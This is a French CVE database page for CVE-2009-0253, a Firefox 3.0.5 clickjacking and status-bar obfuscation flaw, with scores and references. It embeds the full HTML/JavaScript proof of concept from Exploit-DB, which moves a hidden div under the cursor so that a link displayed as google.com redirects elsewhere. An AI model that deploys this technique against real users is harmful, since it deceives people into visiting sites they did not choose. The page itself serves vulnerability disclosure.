CVE-2009-0253 : Détail

CVE-2009-0253

3%V3
Network
2009-01-22
17h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Mozilla Firefox 3.0.5 allows remote attackers to trick a user into visiting an arbitrary URL via an onclick action that moves a crafted element to the current mouse position, related to a "Status Bar Obfuscation" and "Clickjacking" attack.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 7842

Date de publication : 2009-01-20 23h00 +00:00
Auteur : MrDoug
EDB Vérifié : Yes

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking =========================================== <html> <body> <div id="mydiv" onmouseover="document.location='http://www.milw0rm.com';" style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('mydiv').style.left=mouseX-1; document.getElementById('mydiv').style.top=mouseY-1; } </script> <center> <br> <font style="font-family:arial;font-size:32px">Status Bar Obfuscation / Clickjacking</font><br> <font style="font-family:arial;font-size:24px">By MrDoug</font><br> <br> <hr size="3" width="500" color="#000000"> <br> <font style="font-family:arial;font-size:20px">Click the VALID link to google below to visit milw0rm.com</font><br> <br> <a href="http://www.google.com" onclick="updatebox(event)"><font style="font-family:arial;font-size:32px">http://www.google.com</font></a><br> <br> <hr size="3" width="500" color="#000000"> <br> <font style="font-family:arial;font-size:16px">Greetz to Slappywag</font><br> </center> <div style="position:absolute;bottom:0;"> <font style="font-family:arial;font-size:32px">Note this...<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V </font> </div> </body> </html> =========================================== MrDoug mrdoug13[at]gmail[dot]com # milw0rm.com [2009-01-21]

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version 3.0.5

Références

https://www.exploit-db.com/exploits/7842
Tags : exploit, x_refsource_EXPLOIT-DB
http://securityreason.com/securityalert/4936
Tags : third-party-advisory, x_refsource_SREASON